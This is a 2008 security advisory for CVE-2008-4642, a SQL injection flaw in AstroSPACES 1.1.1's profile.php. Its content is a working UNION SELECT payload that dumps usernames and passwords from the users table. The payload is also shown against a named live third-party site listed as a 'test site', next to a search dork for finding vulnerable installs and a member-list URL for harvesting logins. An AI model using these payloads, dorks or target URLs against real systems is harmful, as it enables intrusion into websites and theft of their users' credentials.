Topic : | AstroSPACES (id) Remote SQL Injection Vulnerability
|
SecurityAlert : 4449
CVE : CVE-2008-4642
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : No
Credit : TurkishWarriorr
Published : 22.10.2008
Affected Software : | astrospaces:astrospaces:1.1.1 |
 Advisory Content : # AstroSPACES (profile.php) SQL
Powered by Philippine Website Developers and AstroSPACES © P3NET
2006-2007
#########################################################################
#
# AUTHOR : TurkishWarriorr (Sehitler �lmez Vatan
Bölünmez ....)
#
# HOME : http://www.1923turk.org
#
#########################################################################
#
# DORK : Powered By AstroSPACES
#
##########################################################################
EXPLOIT :
profile.php?action=view&id=160+AND+1=0+UNION+SELECT+ALL+1,group_concat(user
name,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+users--
test sites:
http://quirino.com.ph/friendster/profile.php?action=view&id=160+AND+1=0+UNI
ON+SELECT+ALL+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12
,13,14+from+users--
E mail login :
http://quirino.com.ph/friendster/space.php?action=memberlist
##########################################################################
www.1923turk.org
turkish-warriorr@hotmail.com
References :
http://securityreason.com/expldownload/1/4920/1 (Exploit)
http://www.securityfocus.com/bid/31771
http://www.milw0rm.com/exploits/6758
http://secunia.com/advisories/32290
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|